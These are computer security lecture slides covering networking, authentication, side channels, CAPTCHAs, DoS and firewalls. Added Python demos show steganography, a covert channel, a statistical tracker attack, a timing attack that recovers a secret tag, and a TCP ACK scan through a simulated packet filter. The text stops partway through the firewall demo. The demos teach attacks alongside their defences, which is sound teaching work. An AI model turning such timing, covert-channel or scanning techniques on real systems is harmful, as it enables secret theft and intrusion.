Segurança Informática (Computer Security)


Segurança Informática (Computer Security), MIM / Pedro Brandão

References
- Some slides are based on Computer Networking: A Top Down Approach, 5th edition, Jim Kurose and Keith Ross, Addison-Wesley, April 2009.
- Others are by Dr Lawrie Brown for Computer Security: Principles and Practice, 1st edition, by William Stallings and Lawrie Brown.
- Still others are from Mark Stamp, Information Security: Principles and Practice, 2nd edition (Wiley, 2011).

Segurança Informática nas redes (Computer Security in Networks)

Contents
- Overview
- Some background (network stuff)
- Crypto reminders
- Steganography
- Authentication
- Access control / authorization
- Side channels
- CAPTCHAs
- DoS attacks
- Firewalls
- Intrusion Detection Systems (IDS)
- Internet security protocols: authentication protocols; SSL, IPsec, VPNs, S/MIME
- Other subjects

Overview

Key Security Concepts (figure)

Computer Security Challenges
1. Not simple
2. Must consider potential attacks
3. The procedures used are counter-intuitive
4. Must decide where to deploy mechanisms
5. Involve algorithms and secret information
6. A battle of wits between attacker and admin
7. The benefit is not perceived until it fails
8. Requires regular monitoring
9. Too often an afterthought
10. Regarded as an impediment to using the system

Network Security Attacks
Attacks are classified as passive or active.
- Passive attacks are eavesdropping: release of message contents, traffic analysis. They are hard to detect, so the aim is to prevent them.
- Active attacks modify or fake data: masquerade, replay, modification, denial of service. They are hard to prevent, so the aim is to detect them.

Security Taxonomy (figure)

Background: network stuff

IP Address: intro
- An IP address is a 32-bit identifier of a network interface (128 bits for IPv6)
- Routers have multiple interfaces; terminals usually have only one
- One IP address per interface
- Written in dotted-decimal notation: each byte of the 32-bit binary value as a decimal number

Sub-networks
- IP address = sub-net part (most significant bits) + node part (least significant bits)
- What is a sub-net? A group of interfaces with the same sub-net part of the IP address; its nodes can reach each other without router intervention
- (figure: a network with 3 sub-networks)

IP Address: CIDR
- CIDR: Classless Inter-Domain Routing
- Sub-net part of arbitrary size
- Format: a.b.c.d/x, where x is the number of bits in the sub-net part (e.g. /23: 23 sub-net bits, 9 node bits)

Routing Tables
(figure: routers R1, R2 and R3 interconnecting Net 1 to Net 5; each router's table lists Destination, Mask and Next Hop, with directly attached networks marked "Direct delivery" and the others pointing at a neighbouring router)

IP addresses: how to get one?
Who says which machine has which IP address?
- Hard-coded by the system admin in a file
- DHCP (Dynamic Host Configuration Protocol): dynamically get an address from a server; plug-and-play

DHCP: Dynamic Host Configuration Protocol
Goal: allow a host to dynamically obtain its IP address from a network server when it joins the network.
- Can renew its lease on the address in use
- Allows reuse of addresses (an address is only held while the host is connected and on)
- Supports mobile users who want to join the network
DHCP overview:
1. Host broadcasts a DHCP discover message [optional]
2. DHCP server responds with a DHCP offer message [optional]
3. Host requests an IP address: DHCP request message
4. DHCP server sends the address: DHCP ack message

DHCP client-server scenario (figure: a DHCP server on the subnet and an arriving DHCP client that needs an address in this network)

DHCP: more than an IP address
DHCP can return more than just the allocated IP address on the subnet:
- the address of the first-hop router for the client
- the name and IP address of the DNS server
- the network mask (indicating the network versus host portion of the address)

Reminder: Internet Stack
- Application: network applications (FTP, SMTP, HTTP)
- Transport: data transfer between processes (TCP, UDP)
- Network: routing of datagrams between source and destination (IP, routing protocols)
- Link: data transfer between adjacent network elements (PPP, Ethernet)
- Physical: bits on the wire

Link Layer: Introduction
Terminology:
- hosts and routers are nodes
- the communication channels that connect adjacent nodes along the communication path are links: wired links, wireless links, LANs
- a layer-2 packet is a frame; it encapsulates a datagram
The data-link layer is responsible for transferring a datagram from one node to an adjacent node over a link.

Link Layer Services
- Framing and link access: encapsulate the datagram into a frame, adding a header and trailer; channel access if the medium is shared; MAC addresses are used in frame headers to identify source and destination (different from IP addresses!)
- Reliable delivery between adjacent nodes: similar techniques to the transport layer; seldom used on low bit-error links (fiber, some twisted pair); used on wireless links, which have high error rates

MAC Addresses and ARP
- 32-bit IP address: a network-layer address, used to get a datagram to the destination IP subnet
- MAC (or LAN, physical, or Ethernet) address: used to get a frame from one interface to another physically connected interface (same network); 48-bit MAC address for most LANs, burned into the NIC ROM, sometimes also software settable

LAN Addresses and ARP
- Each adapter on a LAN has a unique LAN address (figure: adapters on a wired or wireless LAN, e.g. 0C-C4-11-6F-E3-98)
- Broadcast address = FF-FF-FF-FF-FF-FF

ARP: Address Resolution Protocol
Question: how to determine the MAC address of B knowing B's IP address?
- Each IP node on the LAN has an ARP table
- ARP table: IP/MAC address mappings for some LAN nodes
(figure: the same LAN, each adapter shown with its IP and MAC address)

Ethernet: bus and star topology
- Bus topology, popular through the mid-90s: all nodes in the same collision domain (they can collide with each other); coaxial cable
- Today the star topology prevails: an active switch in the center; each spoke runs a (separate) Ethernet protocol, so nodes do not collide with each other

Switches vs. Routers
- Both are store-and-forward devices
- Routers are network-layer devices (they examine network-layer headers); they maintain routing tables and implement routing algorithms
- Switches are link-layer devices; they maintain switch tables and implement filtering and learning algorithms

Elements of a wireless network: wireless hosts
- Laptop, PDA, IP phone; they run applications
- May be stationary (non-mobile) or mobile; wireless does not always mean mobility

Elements of a wireless network: base station
- Typically connected to the wired network
- Relay: responsible for sending packets between the wired network and the wireless host(s) in its area
- E.g. cell towers, access points

Elements of a wireless network: wireless link
- Typically used to connect mobile(s) to a base station; also used as a backbone link
- A multiple access protocol coordinates link access
- Various data rates and transmission distances

Elements of a wireless network: infrastructure mode
- The base station connects mobiles into the wired network
- Handoff: a mobile changes the base station providing its connection into the wired network

Elements of a wireless network: ad hoc mode
- No base stations
- Nodes can only transmit to other nodes within link coverage
- Nodes organize themselves into a network and route among themselves

Characteristics of selected wireless link standards
(figure: data rate in Mbps against range for 802.11 n, a/g and b; 802.16 point-to-point (WiMAX); 3G cellular data (UMTS/WCDMA-HSDPA, CDMA2000-1xEVDO); enhanced 3G (UMTS/WCDMA, CDMA2000) and 2G (IS-95, CDMA, GSM). Ranges: indoor 10-30 m; outdoor; mid-range outdoor 200 m to 4 km; long-range outdoor 5 km to 20 km)

Mesh Networks
(figure: ISP A and ISP B reach the Internet over wired links; mesh nodes use wireless links to the infrastructure and wireless links between each other)

Crypto reminders

Symmetric Encryption (figure)

Public Key Encryption (figure)

Public Key Authentication (figure)

Message Authentication Codes (figure)

Secure Hash Functions (figure)

Message Authentication (figure)

X.509 Certificates (figure)

CA root certificates (figure)

Free CAs for ... (list truncated on the slide)

Server Certificate (figure)

Mail certificate (figure)

Steganography

Steganography
According to Herodotus (Greece, 440 BC):
- Shave a slave's head
- Write the message on the head
- Let the hair grow back
- Send the slave to deliver the message
- Shave the slave's head to expose the message (a warning of the Persian invasion)
Historically, steganography was used more than cryptography!

Images and Steganography
- Images use 24 bits for color (RGB): 8 bits for red, 8 for green, 8 for blue
- For example, 0x7E 0x52 0x90 and 0xFE 0x52 0x90 (high-order bit of red changed) are visibly different colors, while 0xAB 0x33 0xF0 and 0xAB 0x33 0xF1 (low-order bit of blue changed) look the same
- Low-order bits don't matter

Images and Stego
- Given an uncompressed image file, for example in BMP format, we can insert information into the low-order RGB bits
- Since the low-order RGB bits don't matter, the result is invisible to the human eye
- But a computer program can see the bits

Stego Example 1 (figure)
- Left side: the plain Alice image
- Right side: Alice with the entire Alice in Wonderland (PDF) hidden in the image

Non-Stego Example
Walrus.html in a web browser. View source reveals:
    <font color=#000000>"the time has come," the Walrus said,</font><br>
    <font color=#000000>"to talk of many things: </font><br>
    <font color=#000000>of shoes and ships and sealing wax </font><br>
    <font color=#000000>of cabbages and kings </font><br>
    <font color=#000000>and why the sea is boiling hot </font><br>
    <font color=#000000>and whether pigs have wings." </font><br>

Stego Example 2
stegowalrus.html in a web browser renders identically (black text). View source reveals:
    <font color=#000100>"the time has come," the Walrus said,</font><br>
    <font color=#010000>"to talk of many things: </font><br>
    <font color=#010100>of shoes and ships and sealing wax </font><br>
    <font color=#010000>of cabbages and kings </font><br>
    <font color=#010000>and why the sea is boiling hot </font><br>
    <font color=#010000>and whether pigs have wings." </font><br>
Hidden message: reading the low-order bit of each R, G, B channel in order gives 01010011 = S, 01001001 = I, and 00 left over.

Seg. Informática - pbrandao
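The two examples above are the same trick at different granularities: write one payload bit into the least significant bit of each 8-bit channel value, whether the channels come from the pixels of an uncompressed image or from the #RRGGBB values of the font tags. The following is an added example, not code from the original slides; the 4x4 "image" is constructed, and the HTML fragment is the stegowalrus.html source quoted on the slide, which the decoder reads back as "SI".

```python
"""LSB steganography over a sequence of 8-bit channel values.

Added example, not part of the original slides. Serves both cases above:
the low-order RGB bits of an uncompressed image, and the low-order bit of
each channel in the <font color=#RRGGBB> tags of stegowalrus.html.
"""
import re


def embed(channels, payload):
    """Return a copy of `channels` with each bit of `payload` (MSB first)
    written into the least significant bit of successive channel values.
    Needs 8 channel values per payload byte."""
    bits = [(b >> i) & 1 for b in payload for i in range(7, -1, -1)]
    if len(bits) > len(channels):
        raise ValueError("cover too small: need %d channel values, have %d"
                         % (len(bits), len(channels)))
    out = list(channels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit      # clear the LSB, then set it to the payload bit
    return out


def extract(channels, nbytes):
    """Read `nbytes` bytes back out of the LSBs of `channels`."""
    out = bytearray()
    for k in range(nbytes):
        byte = 0
        for value in channels[8 * k:8 * k + 8]:
            byte = (byte << 1) | (value & 1)
        out.append(byte)
    return bytes(out)


# --- Case 1: a constructed 24-bit "image", 16 pixels of the slide's colour ---
COVER = [(0xAB, 0x33, 0xF0)] * 16      # 48 channel values -> room for 6 payload bytes
SECRET = b"Alice!"


def stego_image_roundtrip():
    """Hide SECRET in COVER and recover it; also report the largest change
    to any channel value (1: invisible to the eye)."""
    flat = [c for px in COVER for c in px]
    stego = embed(flat, SECRET)
    max_delta = max(abs(a - b) for a, b in zip(flat, stego))
    return extract(stego, len(SECRET)), max_delta


# --- Case 2: the stegowalrus.html source from the slide ---
STEGO_HTML = """<font color=#000100>"the time has come," the Walrus said,</font><br>
<font color=#010000>"to talk of many things: </font><br>
<font color=#010100>of shoes and ships and sealing wax </font><br>
<font color=#010000>of cabbages and kings </font><br>
<font color=#010000>and why the sea is boiling hot </font><br>
<font color=#010000>and whether pigs have wings." </font><br>"""

COLOUR_RE = re.compile(r'color=#([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})')


def html_colour_channels(html):
    """Flatten every #RRGGBB in the font tags to a list of R, G, B integers."""
    channels = []
    for rr, gg, bb in COLOUR_RE.findall(html):
        channels += [int(rr, 16), int(gg, 16), int(bb, 16)]
    return channels


def decode_walrus(html):
    """Six tags give 18 channel values: two whole bytes plus 2 leftover bits."""
    channels = html_colour_channels(html)
    return extract(channels, len(channels) // 8)


if __name__ == "__main__":
    print(stego_image_roundtrip())    # (b'Alice!', 1)
    print(decode_walrus(STEGO_HTML))  # b'SI'
```

The detection side follows from the same code: a cover whose low-order bit plane carries text has LSB statistics that look like compressed data rather than like the image's own noise, which is why LSB stego survives casual viewing but not a statistical examination of the bit plane.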

Authentication

User Authentication
- A fundamental security building block; the basis of access control and user accountability
- The process of verifying an identity claimed by or for a system entity
- Has two steps: identification (specify an identifier) and verification (bind the entity, e.g. a person, to the identifier)
- Distinct from message authentication

Means of User Authentication
Four means of authenticating a user's identity, based on something the individual:
- knows, e.g. password, PIN
- possesses, e.g. key, token, smartcard
- is (static biometrics), e.g. fingerprint, retina
- does (dynamic biometrics), e.g. voice, signature
They can be used alone or combined; all can provide user authentication; all have issues.

Why Passwords?
Why is something you know more popular than something you have and something you are?
- Cost: passwords are free
- Convenience: it is easier for an admin to reset a password than to issue a new thumb

Keys vs Passwords
Crypto keys:
- Suppose the key is 64 bits; then there are 2^64 keys
- Choose the key at random; then the attacker must try about 2^63 keys
Passwords:
- Suppose passwords are 8 characters drawn from 256 different characters; then there are 256^8 = 2^64 passwords
- But users do not select passwords at random
- So the attacker has far fewer than 2^63 passwords to try (dictionary attack)
- Bank password example: m1s3cr3t

Good and Bad Passwords
- Bad passwords: frank, Fido, password, 4444, Pikachu, AustinStamp
- Good passwords? jfiej,43j-emml+y, P0kem0N, FSa7Yago, 0nceuP0nAt1m8, PokeGCTall150

Token Authentication
An object the user possesses in order to authenticate, e.g. an embossed card, a magnetic stripe card, a memory card, a smartcard.

Smart card: Cartão de Cidadão (Portuguese citizen card) (figure, from [SecHISSantos])

Cartão de Cidadão (figure, from [SecHISSantos])

CC Properties (from [SecHISSantos])
Where each item is carried: on the visible face of the card, in the machine-readable zone (MRZ), and/or in the integrated circuit (chip).
- Visible, MRZ and chip: last names, first names, nationality, birth date, sex, document number
- In two of the three: parents' names, height, facial image, civil ID number, tax ID number, health ID number, social security ID number, expiry date
- In one only: signature, emitting country (Portuguese Republic), type of document, emission date, address (1), fingerprints (2), eventual indications according to the law, authentication certificate (2), electronic signature certificate, software applications needed, free writing zone for citizen use, additional health data (health sub-system, etc.)
Notes: (1) data not accessible; (2) PIN (password) protected access/use.

Biometric Authentication
Authenticate a user based on one of their physical characteristics.

Operation of a Biometric System (figure)

Remote User Authentication
- Authentication over a network is more complex: problems of eavesdropping and replay
- Generally uses challenge-response:
  1. the user sends their identity
  2. the host responds with a random number r
  3. the user computes f(r, h(p)) from the password p and sends it back
  4. the host compares the value from the user with its own computed value; if they match, the user is authenticated
- Protects against a number of attacks

Authentication Security Issues
- client attacks
- host attacks
- eavesdropping
- replay
- trojan horse
- denial of service

Access Control

Access Control
The prevention of unauthorized use of a resource, including the prevention of use of a resource in an unauthorized manner.
- A central element of computer security
- Assumes users and groups authenticate to the system and are assigned access rights to certain resources on the system

Access Control Principles (figure)

Access Control Elements
- Subject: an entity that can access objects; a process representing a user/application; often 3 classes: owner, group, world
- Object: an access-controlled resource, e.g. files, directories, records, programs, etc.; their number and type depend on the environment
- Access right: the way in which a subject accesses an object, e.g. read, write, execute, delete, create, search

UNIX File Access Control
Example mode rwxrw----:
- The owner can read, write and execute the file
- Any user in the owner's group can read and write the file
- All other users cannot read, write or execute the file

Role-Based Access Control (figure)

Segurança Informática - MIM 2011/12

Side channels

Multilevel Security (MLS)
- MLS is needed when subjects/objects at different levels use, or are on, the same system
- Security levels for subjects and objects; for DoD levels: TOP SECRET > SECRET > CONFIDENTIAL > UNCLASSIFIED
- Subjects have clearances and objects have classifications

Covert Channel
- MLS is designed to restrict the legitimate channels of communication
- There may be other ways for information to flow: for example, resources shared across levels can be used to signal information
- Covert channel: a communication path not intended as such by the system's designers

Covert Channel Example
- Alice has TOP SECRET clearance, Bob has CONFIDENTIAL clearance
- Suppose the file space is shared by all users
- Alice creates file FileXYzW to signal 1 to Bob, and removes the file to signal 0
- Once per minute Bob lists the files: if FileXYzW does not exist, Alice sent 0; if it exists, Alice sent 1
- Alice can leak TOP SECRET information to Bob!
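The example above run end to end, as an added example that is not part of the original slides: Alice only ever creates or deletes her own file, Bob only ever lists the directory, and yet a byte string crosses from TOP SECRET to CONFIDENTIAL one bit per clock tick. The once-per-minute clock is replaced by an explicit tick loop so the script runs instantly; the shared directory is a temporary directory created here, and the file name FileXYzW is the one from the slide.

```python
"""Covert channel through the existence of a shared file name.

Added example, not from the original slides. Alice (high side) and Bob
(low side) share a directory; the MLS policy prevents Alice from writing
anything Bob may read, but not from creating a file, and not Bob from
listing the directory. One bit is signalled per tick.
"""
import os
import tempfile

SIGNAL_FILE = "FileXYzW"          # the only thing Alice and Bob agree on in advance


def to_bits(data):
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]


def from_bits(bits):
    out = bytearray()
    for k in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for bit in bits[k:k + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


class Alice:
    """High side: may create/remove her own file, never writes data Bob can read."""

    def __init__(self, shared_dir, secret):
        self.path = os.path.join(shared_dir, SIGNAL_FILE)
        self.bits = to_bits(secret)

    def tick(self, i):
        if self.bits[i]:
            open(self.path, "w").close()        # file present  == 1
        elif os.path.exists(self.path):
            os.remove(self.path)                 # file absent   == 0


class Bob:
    """Low side: only lists the directory; never opens Alice's file."""

    def __init__(self, shared_dir):
        self.shared_dir = shared_dir
        self.received = []

    def tick(self):
        self.received.append(1 if SIGNAL_FILE in os.listdir(self.shared_dir) else 0)


def leak(secret):
    """Run the channel for 8 ticks per secret byte and return what Bob recovers."""
    with tempfile.TemporaryDirectory() as shared:
        alice, bob = Alice(shared, secret), Bob(shared)
        for i in range(len(alice.bits)):
            alice.tick(i)      # Alice sets this minute's bit
            bob.tick()         # Bob lists the files once per minute
        return from_bits(bob.received)


def bits_per_hour(tick_seconds=60):
    """Channel bandwidth at the slide's once-per-minute rate: 1 bit per tick."""
    return 3600 // tick_seconds


if __name__ == "__main__":
    print(leak(b"TOP SECRET: the codeword is XYZZY"))
    print(bits_per_hour(), "bits/hour")
```

At one bit per minute the channel is slow (60 bits per hour), which is why covert-channel analysis is usually about bounding bandwidth rather than eliminating every shared resource: a 128-bit key still leaks in about two hours.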

Inference Control Example
Suppose we query a database:
- Question: What is the average salary of female CS professors at SJSU? Answer: $95,000
- Question: How many female CS professors are there at SJSU? Answer: 1
Specific information has leaked from responses to general questions!

Inference Control and Research
- For example, medical records are private but valuable for research
- How to make information available for research and protect privacy?
- How to allow access to such data without leaking specific information?

Naive Inference Control
- Remove names from medical records? It may still be easy to get specific information from such anonymous data
- Removing names is not enough, as seen in the previous example
- What more can be done?

Less-Naive Inference Control
- Query set size control: don't return an answer if the set size is too small
- N-respondent, k% dominance rule: do not release a statistic if k% or more of it is contributed by N or fewer respondents; example: the average salary in Bill Gates's neighborhood; this approach is used by the US Census Bureau
- Randomization: add a small amount of random noise to the data
- Many other methods; none satisfactory
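Both controls implemented over a constructed salary table, as an added example that is not from the original slides: the naive query leaks the single female CS professor's salary exactly as on the previous slide, the guarded query refuses it, and the dominance rule refuses the "Bill Gates in the neighborhood" average. The records, the minimum set size (3) and the dominance parameters (N=1, k=75%) are illustrative choices for this example, not values from the slides or from the Census Bureau. The last function shows why "none satisfactory": two averages that both pass the controls still differ by exactly one person's salary.

```python
"""Query set size control and the N-respondent k% dominance rule.

Added example, not from the original slides. Records and thresholds are
constructed for illustration.
"""

# Constructed records: not real people
RECORDS = [
    {"name": "P1", "dept": "CS",   "sex": "F", "salary": 95_000},
    {"name": "P2", "dept": "CS",   "sex": "M", "salary": 90_000},
    {"name": "P3", "dept": "CS",   "sex": "M", "salary": 88_000},
    {"name": "P4", "dept": "CS",   "sex": "M", "salary": 101_000},
    {"name": "P5", "dept": "Math", "sex": "F", "salary": 80_000},
    {"name": "P6", "dept": "Math", "sex": "F", "salary": 82_000},
    {"name": "P7", "dept": "Math", "sex": "F", "salary": 79_000},
    {"name": "P8", "dept": "Math", "sex": "M", "salary": 2_000_000},  # the Bill Gates of the table
]

MIN_SET_SIZE = 3      # query set size control (illustrative)
DOMINANCE_N = 1       # N respondents ...
DOMINANCE_K = 0.75    # ... may not contribute k% or more (illustrative)


class Suppressed(Exception):
    """The statistic would reveal information about an individual."""


def select(records, **where):
    return [r for r in records if all(r[k] == v for k, v in where.items())]


def naive_average(records, **where):
    """No control at all: the slide's leak."""
    rows = select(records, **where)
    return sum(r["salary"] for r in rows) / len(rows)


def guarded_average(records, **where):
    rows = select(records, **where)
    # Rule 1: refuse tiny query sets (the "1 female CS professor" case)
    if len(rows) < MIN_SET_SIZE:
        raise Suppressed("query set of size %d is below %d" % (len(rows), MIN_SET_SIZE))
    # Rule 2: refuse statistics dominated by N or fewer respondents
    total = sum(r["salary"] for r in rows)
    top = sum(sorted((r["salary"] for r in rows), reverse=True)[:DOMINANCE_N])
    if top / total >= DOMINANCE_K:
        raise Suppressed("%d respondent(s) contribute %.0f%% of the total"
                         % (DOMINANCE_N, 100 * top / total))
    return total / len(rows)


def run_query(records, **where):
    """Return the average, or None when the controls suppress the answer."""
    try:
        return guarded_average(records, **where)
    except Suppressed:
        return None


def tracker_attack(records):
    """Both averages pass the controls, and counts are released (as on the slide),
    yet their difference is the one female CS professor's salary."""
    n_all = len(select(records, dept="CS"))
    n_men = len(select(records, dept="CS", sex="M"))
    avg_all = guarded_average(records, dept="CS")
    avg_men = guarded_average(records, dept="CS", sex="M")
    return round(n_all * avg_all - n_men * avg_men)


if __name__ == "__main__":
    print(naive_average(RECORDS, dept="CS", sex="F"))   # 95000.0: leaked
    print(run_query(RECORDS, dept="CS", sex="F"))       # None: set too small
    print(run_query(RECORDS, dept="Math"))              # None: one respondent dominates
    print(run_query(RECORDS, dept="CS"))                # 93500.0
    print(tracker_attack(RECORDS))                      # 95000: leaked anyway
```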

Side Channel Attacks on Crypto
- It is sometimes possible to recover the key without directly attacking the crypto algorithm
- A side channel consists of incidental information
- Side channels can arise from the way a computation is performed: the media used, the power consumed, unintended emanations, etc.
- Induced faults can also reveal information
- A side channel may reveal a crypto key

Side Channels
- Emanations security (EMSEC): the electromagnetic field (EMF) from a computer screen can allow the screen image to be reconstructed at a distance; smartcards have been attacked via EMF emanations
- Differential power analysis (DPA): smartcard power usage depends on the computation
- Differential fault analysis (DFA): a key stored on a smartcard in the GSM system could be read by using a flashbulb to induce faults
- Timing analysis: different computations take different time; RSA keys have been recovered over a network (OpenSSL)!
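A timing channel in its simplest form, as an added example that is not from the original slides: a server checks an 8-byte authentication tag with a comparison that stops at the first mismatching byte, so the time it takes tells the attacker how many leading bytes were right. Real timing attacks estimate that quantity statistically from wall-clock measurements over many requests; to keep the script deterministic, "time" here is the number of byte comparisons the check performs. The secret tag and both servers are constructed for the example; the fix is the constant-time comparison the standard library already provides.

```python
"""Timing side channel against an early-exit comparison, and the fix.

Added example, not from the original slides. `work` models elapsed time
as the number of bytes the comparison inspected.
"""
import hmac

SECRET_TAG = bytes.fromhex("9f3a5c0128d4e7b6")      # constructed 8-byte tag


class LeakyServer:
    """Verifies a tag with a comparison that returns at the first mismatch."""

    def __init__(self, secret_tag):
        self._tag = secret_tag
        self.work = 0         # "time" taken by the last verify()
        self.queries = 0

    def verify(self, guess):
        self.queries += 1
        self.work = 0
        if len(guess) != len(self._tag):
            return False
        for a, b in zip(guess, self._tag):
            self.work += 1            # one unit of time per byte inspected
            if a != b:
                return False          # early exit: the leak
        return True


class ConstantTimeServer(LeakyServer):
    """Same interface; the comparison inspects every byte regardless of input."""

    def verify(self, guess):
        self.queries += 1
        self.work = len(self._tag)    # no data-dependent branch
        return hmac.compare_digest(guess, self._tag)


def recover_tag(server, tag_len=8):
    """Byte-at-a-time recovery: for each position, keep the candidate that makes
    the check run one step longer than all the others. Returns (recovered, accepted).
    Against a constant-time server every candidate ties, so the attacker is stuck
    at the first position with the empty prefix."""
    known = bytearray()
    for pos in range(tag_len):
        timings = {}
        for candidate in range(256):
            probe = bytes(known) + bytes([candidate]) + b"\x00" * (tag_len - pos - 1)
            if server.verify(probe):              # only possible once every byte is right
                known.append(candidate)
                return bytes(known), True
            timings[candidate] = server.work
        slowest = max(timings.values())
        outliers = [c for c, w in timings.items() if w == slowest]
        if len(outliers) != 1:                    # no timing signal: give up honestly
            return bytes(known), False
        known.append(outliers[0])
    return bytes(known), False


if __name__ == "__main__":
    leaky = LeakyServer(SECRET_TAG)
    print(recover_tag(leaky), "after", leaky.queries, "queries")   # full tag, ~2000 queries
    print(recover_tag(ConstantTimeServer(SECRET_TAG)))             # (b'', False)
```

The leaky server gives up a 64-bit tag in under 8 x 256 = 2048 queries instead of the 2^63 an attacker should need on average; `hmac.compare_digest` removes the data-dependent branch, which is the same principle behind the constant-time fixes applied to the OpenSSL RSA code the slide refers to.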

CAPTCHA

Turing Test
- Proposed by Alan Turing in 1950
- A human asks questions of one human and one computer, without seeing either
- If the questioner cannot distinguish the human from the computer, the computer passes the test
- The gold standard in artificial intelligence
- No computer can pass this today, but some claim to be close to passing

CAPTCHA
CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart
- Automated: the test is generated and scored by a computer program
- Public: the program and data are public
- Turing test to tell ...: humans can pass the test, but machines cannot
- Also known as HIP: Human Interactive Proof
- Like an inverse Turing test (well, sort of)

CAPTCHA Paradox?
- A CAPTCHA is a program that can generate and grade tests that it itself cannot pass (much like some professors)
- Paradox: a computer creates and scores a test that it cannot pass!
- CAPTCHAs are used so that only humans can get access (i.e., no bots/computers)
- CAPTCHA is for access control

CAPTCHA Uses?
- Original motivation: automated bots stuffed the ballot box in a vote for best CS grad school (SJSU vs Stanford?)
- Free services: spammers like to use bots to sign up for 1000s of accounts; CAPTCHAs are employed so that only humans get accounts
- Sites that do not want to be automatically indexed by search engines: a CAPTCHA would force human intervention

CAPTCHA: Rules of the Game
- Easy for most humans to pass
- Difficult or impossible for machines to pass, even with access to the CAPTCHA software: from the attacker's perspective, the only unknown is a random number
- Desirable to have different CAPTCHAs in case some person cannot pass one type (a blind person could not pass a visual test, etc.)

Do CAPTCHAs Exist?
- Test: find 2 words in the following (figure: distorted-text CAPTCHA)
- Easy for most humans
- A (difficult?) OCR problem for a computer (OCR = Optical Character Recognition)

DoS Attacks: Denial of Service

Classic Denial of Service Attacks (figure)

Source Address Spoofing
- Use forged source addresses; given sufficient privilege to use raw sockets, they are easy to create
- Generate large volumes of packets directed at the target with different, random source addresses
- Causes the same congestion on the attacked link
- The responses are scattered across the Internet
- The real source is much harder to identify

SYN Spoofing
- Another common attack
- Attacks the ability of a server to respond to future connection requests by overflowing the tables used to manage them
- Hence an attack on a system resource

TCP Connection Handshake (figure)

SYN Spoofing Attack (figure)

DDoS Control Hierarchy (figure)

Firewalls

Internet Firewall
- The firewall must determine what to let in to the internal network and/or what to let out
- Access control for the network (figure: Internet, firewall, internal network)

Firewall as Secretary
- A firewall is like a secretary: to meet with an executive, you first contact the secretary; the secretary decides if the meeting is important, so the secretary filters out many requests
- You want to meet the chair of the CS department? The secretary does some filtering
- You want to meet the PotUS? The secretary does lots of filtering

Firewall Terminology
- There is no standard firewall terminology
- Types of firewalls: packet filter (works at the network layer); stateful packet filter (transport layer); application proxy (application layer)
- Other names are often used, e.g. deep packet inspection

Types of Firewalls (figure: inside / outside)

Packet Filter
- Operates at the network layer
- Can filter based on: source IP address, destination IP address, source port, destination port, flag bits (SYN, ACK, etc.), egress or ingress

Packet Filter
- Advantages? Speed
- Disadvantages? No concept of state; cannot see TCP connections; blind to application data

Packet filters are configured via Access Control Lists (ACLs):
Action | Source IP | Dest IP | Source Port | Dest Port | Protocol | Flag Bits
Allow  | Inside    | Outside | Any         | 80        | HTTP     | Any
Allow  | Outside   | Inside  | 80          | > 1023    | HTTP     | ACK
Deny   | All       | All     | All         | All       | All      | All
Q: Intention? A: Restrict traffic to Web browsing.

TCP ACK Scan
- The attacker scans for open ports through the firewall; port scanning is the first step in many attacks
- The attacker sends a packet with the ACK bit set, without a prior 3-way handshake; this violates the TCP protocol
- The ACK packet passes through a packet filter firewall: it appears to be part of an ongoing connection
- An RST is sent by the recipient of such a packet
(figure: Trudy sends ACK packets to destination ports 1207, 1208 and 1209 through the packet filter; the internal network answers the probe to 1209 with an RST)
- The attacker now knows that port 1209 is open through the firewall
- A stateful packet filter can prevent this, since the scan packets are not part of established connections

Stateful Packet Filter
- Adds state to the packet filter
- Operates at the transport layer
- Remembers TCP connections, flag bits, etc.
- Can even remember UDP packets (e.g., DNS requests)
- Advantages? Can do everything a packet filter can do, plus keep track of ongoing connections (so it prevents the TCP ACK scan)
- Disadvantages? Cannot see application data; slower than packet filtering
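The ACL from the slide, the ACK scan against it, and the stateful fix, as an added example that is not from the original slides. The stateless filter implements the three ACL rows literally; Trudy's probes are ACK-only packets from source port 80 to high ports, so the second row forwards all of them. The stateful filter applies the same rows but only admits inbound packets that match a connection an inside host opened. Addresses, ports and the packet representation are constructed; treating 10.0.0.0/8 as "inside" is an assumption for the example.

```python
"""Stateless packet filter (the slide's ACL), the TCP ACK scan it forwards,
and a stateful filter that stops it.

Added example, not from the original slides. Addresses and the packet
model are constructed; "inside" = 10.0.0.0/8 is an assumption.
"""
import ipaddress
from dataclasses import dataclass

INSIDE = ipaddress.ip_network("10.0.0.0/8")


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    syn: bool = False
    ack: bool = False


def side(addr):
    return "inside" if ipaddress.ip_address(addr) in INSIDE else "outside"


def stateless_filter(p):
    """The ACL from the slide, row by row; no memory of previous packets."""
    if side(p.src) == "inside" and side(p.dst) == "outside" and p.dport == 80:
        return "allow"                                   # Inside -> Outside, dst 80
    if (side(p.src) == "outside" and side(p.dst) == "inside"
            and p.sport == 80 and p.dport > 1023 and p.ack):
        return "allow"                                   # Outside -> Inside, src 80, ACK
    return "deny"                                        # Deny all


class StatefulFilter:
    """Same ACL, but inbound replies must match a connection an inside host opened."""

    def __init__(self):
        self.connections = set()   # (inside ip, inside port, outside ip, outside port)

    def __call__(self, p):
        if side(p.src) == "inside" and side(p.dst) == "outside" and p.dport == 80:
            if p.syn and not p.ack:                      # new outbound connection
                self.connections.add((p.src, p.sport, p.dst, p.dport))
            return "allow"
        if (side(p.src) == "outside" and side(p.dst) == "inside"
                and p.sport == 80 and p.ack
                and (p.dst, p.dport, p.src, p.sport) in self.connections):
            return "allow"
        return "deny"


def ack_scan(fw, attacker="203.0.113.7", victim="10.0.0.5", ports=(1207, 1208, 1209)):
    """Trudy's ACK scan: ACK-only packets from 'port 80' with no prior handshake.
    Returns the ports whose probes the firewall forwarded (each would draw an RST)."""
    return [port for port in ports
            if fw(Packet(src=attacker, dst=victim, sport=80, dport=port, ack=True)) == "allow"]


def legitimate_browsing(fw):
    """An inside host opens a connection and the web server answers:
    both packets must still be allowed."""
    syn = Packet(src="10.0.0.5", dst="93.184.216.34", sport=40000, dport=80, syn=True)
    syn_ack = Packet(src="93.184.216.34", dst="10.0.0.5", sport=80, dport=40000,
                     syn=True, ack=True)
    return fw(syn), fw(syn_ack)


if __name__ == "__main__":
    print(ack_scan(stateless_filter))              # [1207, 1208, 1209]: the scan gets through
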